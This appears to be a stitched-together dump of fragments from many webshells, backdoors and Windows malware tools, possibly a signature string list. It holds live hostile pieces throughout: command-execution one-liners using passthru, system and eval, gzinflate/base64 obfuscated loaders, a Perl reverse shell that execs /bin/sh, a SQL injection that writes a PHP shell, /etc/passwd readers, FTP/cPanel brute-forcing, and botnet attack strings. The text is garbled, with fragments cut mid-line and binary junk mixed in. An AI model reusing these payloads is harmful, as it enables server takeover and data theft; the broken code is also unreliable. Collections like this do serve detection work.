color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. 
- sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? 
echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... 
trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' 
<br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. 
x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? 
$_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . 
$_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . 
\" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of 
the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . 
substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 
'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' 
-- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? 
echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... 
failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz 
returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + 
victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? 
system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail 